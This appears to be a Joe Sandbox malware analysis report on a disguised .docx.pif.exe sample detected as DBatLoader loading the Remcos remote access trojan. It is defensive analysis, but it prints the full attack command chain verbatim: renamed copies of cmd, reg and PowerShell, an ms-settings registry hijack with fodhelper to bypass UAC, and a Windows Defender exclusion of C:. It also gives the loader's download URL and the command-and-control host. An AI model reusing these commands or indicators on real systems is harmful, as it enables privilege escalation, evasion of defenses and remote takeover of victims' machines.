Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Overview

General Information

Sample name:#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
renamed because original name is a hash value
Original sample name:-202471.docx.pif.exe
Analysis ID:1466663
MD5:b9da5a47e1e68ef90c075dc14f8e2037
SHA1:4ae96232817bf7b3919aa298efc7c0d18649ed9d
SHA256:8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
Tags:exepif
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe (PID: 4220 cmdline: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe" MD5: B9DA5A47E1E68EF90C075DC14F8E2037)
    • drbdmeyP.pif (PID: 2796 cmdline: C:\Users\Public\Libraries\drbdmeyP.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • cmd.exe (PID: 3960 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • extrac32.exe (PID: 1356 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 5884 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 5428 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 6160 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7024 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 5856 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 1264 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 3180 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 6516 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 1648 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • xkn.exe (PID: 4340 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
            • alpha.exe (PID: 7368 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • ger.exe (PID: 7400 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • per.exe (PID: 8080 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • alpha.exe (PID: 1652 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • taskkill.exe (PID: 7268 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • alpha.exe (PID: 8188 cmdline: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • extrac32.exe (PID: 7608 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • colorcpl.exe (PID: 7688 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • SystemSettingsAdminFlows.exe (PID: 7336 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}

Threatname: Remcos

{"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\gaban\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4a8:$a1: Remcos restarted by watchdog!
          • 0x6ca20:$a3: %02i:%02i:%02i:%03i
          0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6656c:$str_b2: Executing file:
          • 0x675ec:$str_b3: GetDirectListeningPort
          • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x67118:$str_b7: \update.vbs
          • 0x66594:$str_b9: Downloaded file:
          • 0x66580:$str_b10: Downloading file:
          • 0x66624:$str_b12: Failed to upload file:
          • 0x675b4:$str_b13: StartForward
          • 0x675d4:$str_b14: StopForward
          • 0x67070:$str_b15: fso.DeleteFile "
          • 0x67004:$str_b16: On Error Resume Next
          • 0x670a0:$str_b17: fso.DeleteFolder "
          • 0x66614:$str_b18: Uploaded file:
          • 0x665d4:$str_b19: Unable to delete:
          • 0x67038:$str_b20: while fso.FileExists("
          • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
          Click to see the 10 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          31.2.colorcpl.exe.4580000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            31.2.colorcpl.exe.4580000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              31.2.colorcpl.exe.4580000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              31.2.colorcpl.exe.4580000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              31.2.colorcpl.exe.4580000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 27 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: TrustedPath UAC Bypass Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 8080, ProcessName: per.exe
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\drbdmeyP.pif, NewProcessName: C:\Users\Public\Libraries\drbdmeyP.pif, OriginalFileName: C:\Users\Public\Libraries\drbdmeyP.pif, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ParentProcessId: 4220, ParentProcessName: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessCommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, ProcessId: 2796, ProcessName: drbdmeyP.pif
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Pyemdbrd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessId: 4220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pyemdbrd
              Sigma detected: Parent in Public Folder Suspicious Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 5856, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ProcessId: 1264, ProcessName: extrac32.exe
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe
              Sigma detected: Suspicious Creation with Colorcpl
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7688, TargetFilename: C:\ProgramData\gaban
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Pyemdbrd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessId: 4220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pyemdbrd
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\drbdmeyP.pif, NewProcessName: C:\Users\Public\Libraries\drbdmeyP.pif, OriginalFileName: C:\Users\Public\Libraries\drbdmeyP.pif, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ParentProcessId: 4220, ParentProcessName: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessCommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, ProcessId: 2796, ProcessName: drbdmeyP.pif
              Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 4340, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txw30cbq.i2f.ps1
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe
              Sigma detected: Suspicious Reg Add Open Command
              Source: Process startedAuthor: frack113: Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 3A 22 D7 FF B5 88 35 F7 AA 82 64 02 49 D7 0F 80 19 35 91 19 F2 25 D3 D7 95 75 B1 85 AF 26 E7 F7 95 39 8F 07 14 53 A4 AA 8E C1 BA 48 58 08 D9 D0 5A 99 34 0A 45 06 44 72 48 5F 36 51 EF 6D E4 7F 1D 69 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3\exepath

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: www.vipguyclassproject2024.spaceAvira URL Cloud: Label: malware
              Found malware configuration
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}
              Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Pyemdbrd.PIFReversingLabs: Detection: 44%
              Source: C:\Users\Public\Libraries\Pyemdbrd.PIFVirustotal: Detection: 50%Perma Link
              Multi AV Scanner detection for submitted file
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeReversingLabs: Detection: 44%
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeVirustotal: Detection: 50%Perma Link
              Yara detected Remcos RAT
